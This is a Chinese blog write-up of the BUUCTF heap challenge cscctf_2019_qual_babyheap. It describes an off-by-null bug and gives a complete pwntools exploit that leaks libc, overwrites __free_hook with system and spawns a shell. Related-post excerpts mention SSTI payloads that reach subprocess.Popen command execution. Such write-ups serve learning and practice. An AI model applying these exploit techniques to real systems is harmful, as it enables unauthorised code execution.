【buuctf】cscctf_2019_qual_babyheap

最新推荐文章于 2024-01-15 12:48:13 发布
最新推荐文章于 2024-01-15 12:48:13 发布
阅读量1.9k 收藏 1
点赞数 3
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51055545/article/details/122941755
版权

buuctf【cscctf_2019_qual_babyheap】

今天找了一道100分题目,题目本身并没有那么难
例行检查
在这里插入图片描述
64位的程序,保护机制全开,放到IDA中分析
漏洞分析
在这里插入图片描述
函数功能很简单,功能基本齐全,漏洞点在creat()中,
在这里插入图片描述
当我们申请堆块,写入内容时,会在最后多写入一个’\x00’字节,存在off by null 溢出,但程序只允许我们申请15个堆块,因此要合理利用堆块。
利用思路
1.通过for循环申请足够多的堆块,在将其释放,构造出unsorted bin
2.堆风水,利用off by null 构造overlap,泄露libc地址
3.在次通过off by null 来劫持free_hook指针,劫持为system
4.free掉’/bin/sh’,get shell

exp:

from pwn import *
elf = ELF('./cscctf_2019_qual_babyheap')
io = remote('node4.buuoj.cn',25675)
#io = process('./cscctf_2019_qual_babyheap')
libc = ELF('./libc-2.27.so')
context.log_level='debug'

def choice(c):
	io.recvuntil('>>')
	io.sendline(str(c))

def add(index,size,content):
	choice(1)
	io.recvuntil(':')
	io.sendline(str(index))
	io.recvuntil(':')
	io.sendline(str(size))
	io.recvuntil(':')
	io.send(content)

def show(index):
	choice(3)
	io.recvuntil(':')
	io.sendline(str(index))

def free(index):
	choice(2)
	io.recvuntil(':')
	io.sendline(str(index))

#堆风水
for i in range(7):
	add(i,0xf0,'A')

add(7,0xf0,'A')
add(8,0x18,'A')
add(9,0xf0,'A')
add(10,0x28,'A')
#free掉前7个0xf0的堆块,再次free掉0xf0大小的堆块就会进入unsorted bin 中
for i in range(7):
	free(i)

free(7)#进入unsorted bin 
free(8)
add(8,0x18,'A'*0x10+p64(0x120))#利用 off by null
free(9)#触发向上合并

add(7,0xd0,'A')
add(9,0x10,'A')
show(8)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
success(hex(leak))
libc_base = leak-0x3ebca0
success(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(free_hook))
success(hex(system))

#劫持free_hook指针
free(7)
free(9)

for i in range(7):
	add(i,0xf0,'A')

add(9,0x10,'A')
add(7,0x10,'A')

add(11,0xf0,'A')
#10
add(12,0xf0,'A')
add(13,0x20,'A')

for i in range(7):
	free(i)

free(11)
free(10)
add(10,0x28,'A'*0x20+p64(0x130))#同样利用off by null
free(10)
free(12)

add(0,0x90,'A')
add(1,0x70,'A'*0x50+p64(0x100)+p64(0x30)+p64(free_hook))
add(2,0x20,'A')
add(3,0x20,p64(system))#覆写 free_hook 为system
add(4,0xf0,'/bin/sh\x00')

free(4)#触发
#gdb.attach(io)

io.interactive()

在这里插入图片描述
喜提flag!!

BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1654
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
weixin_48335916的博客
01-05 623
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={{1*9}} 成功回显,说明存在ssti注入 使用{{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。 import requests import r
BUUCTFcscctf_2019_qual_signal
最新发布
xy1458214551的博客
01-15 464
BUUCTFcscctf_2019_qual_signal题解
rctf_2019_babyheap、0ctf_2018_heapstorm2学习(house of storm)
weixin_46521144的博客
09-10 1600
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把堆地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
0ctf_2018_heapstorm2 && rctf_2019_babyheap
qq_73149934的博客
06-14 265
分配合适的chunk,unsortedbin 剩余的一个chunk(0x4e1)是我们需要的largebin chunk,此时处于释放状态。这看似没有问题,但是注意,strcpy函数会在末尾加上null,相当于13个字节,发生了off by null。2.23-0ubuntu11house of storm,poison null byte,堆风水,堆orw。分配合适的chunk,chunk2是unsorted chunk(0x4f1),此时处于分配状态。同时,mallopt函数禁用了fastbin。
[BUUCTF-pwn] cscctf_2019_final_babyprintf
weixin_52640415的博客
11-15 322
从名字看是个formatstring漏洞题,先看保护: /buuctf/383_cscctf_2019_final_babyprintf/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 保护基本全开,formatstring用不着canary 再看题目: int _
人脸图像特征提取matlab代码-jcs_qual:jcs_qual
05-22
"jcs_qual-master"可能是项目的主要源代码目录,其中可能包含了预处理、检测、特征提取、编码和识别的脚本或函数。通过阅读和运行这些代码,你可以深入理解人脸图像特征提取的过程,并且可以根据自己的需求进行修改...
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1653
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
GN_Qual_Download_Tool_User_V4.0.5.2.zip
05-20
2. **驱动安装**:在使用GN_Qual_Download_Tool之前,必须安装正确的USB驱动程序,这通常是高通驱动或通用驱动,确保电脑能够识别你的设备。驱动安装不正确可能导致无法连接设备。 3. **下载工具**:解压GN_Qual_...
split_vector_into_e qual_sized_bins( input_vect , N_per_bin ):给定一个向量,分成相等大小的 bin,每个 bin 中有 N_per_bin 个元素-matlab开发
05-29
bins_idx = split_vector_into_equal_sized_bins( input_vect , N_per_bin ) 给定一个向量分成大小相等的 bin,每个 bin 中有 N_per_bin 元素返回每个元素的 bin 差异 w/discretize() 是 discretize() 制作宽度均匀...
如何在有限的plt下getshell&&cscctf_2019_qual_babystack
azraelxuemo的博客
04-04 318
文章目录cscctf_2019_qual_babystack题目分析保护漏洞plt攻击大致思路调试第一次溢出的payloadgetshellallpayload 最近做的题目都比较有意思啊,这个题目也一样 cscctf_2019_qual_babystack cscctf_2019_qual_babystack 题目分析 保护 漏洞 直接来了个栈溢出,我开始说这不是傻逼题目吗 plt 我靠,只有读的,这不完犊子了吗 攻击 大致思路 大致思路就是ROP 但怎么泄露libc 调试 可以看到地址只有最后一
[CSCCTF 2019 Qual]FlaskLight 记录
SopRomeo的博客
10-09 947
这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 存在sql注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{''.__class__.__mro__[2].__subclasses__()}} 利用这个可以读取所有的类,然后看看能不能RCE 找到catch_warnings类, 但是无法RCE 看了wp,发现可以利用subprocess.Popen这个类来进行RCE 学废了 网上搜的模板注入,都没
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 748
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...
一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
sGanYu
07-29 1861
做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是太少了,额也有可能是大佬觉得没有必要讲,不过在这里还是记录一下自己的一些解题思路,一方面也是防止自己忘记,可能会有错误,欢迎前来指正。.........
BUUCTF pwn 五月刷题
coco的博客
05-04 774
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
house of storm+堆SROP+orw
tbsqigongzi的博客
08-10 544
house of storm + srop + orw
buuoj Pwn writeup 276-280
yongbaoii的博客
09-06 375
276 axb_2019_final_blindHeap 朴实而无华。 277 codegate2018_melong 278 whctf2017_note_sys 279 pwnable_wtf 显然整数溢出,然后栈溢出就好啦。 exp from pwn import * r = remote('node4.buuoj.cn', 28374) win = 0x4005F4 payload = 0x38 * 'a' + p64(win) r.sendline("-1") r.sendline
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初 · mochu7
07-26 2924
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
[BUUCTF]PWN——actf_2019_babystack
mcmuyanga的博客
01-19 1530
actf_2019_babystack 附件 步骤: 例行检查,64位程序,开启了nx保护 本地运行一下看看大概的情况,有两次输入 64位ida载入 程序可以输入两次,加上只能覆盖ebp和返回地址,想到的是栈迁移的方法 栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是 leave:move rbp,rsp;pop rbp retn:pop rdi 利用思路 第一个输入点固定输入0xe0,造成溢出 19行会打印出s在栈上的地址,接收一下,获得栈地址 由于没有现成的system
Java环境下Super__Qual_Backup压缩技术解析
由于“Super__Qual_Backup”暗示了它是一个高级质量的备份方案,我们可以从Java编程角度和备份策略两个方面展开详细的知识点。 ### Java编程角度知识点 1. **Java类命名规范**: Java中的类名通常遵循驼峰命名法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值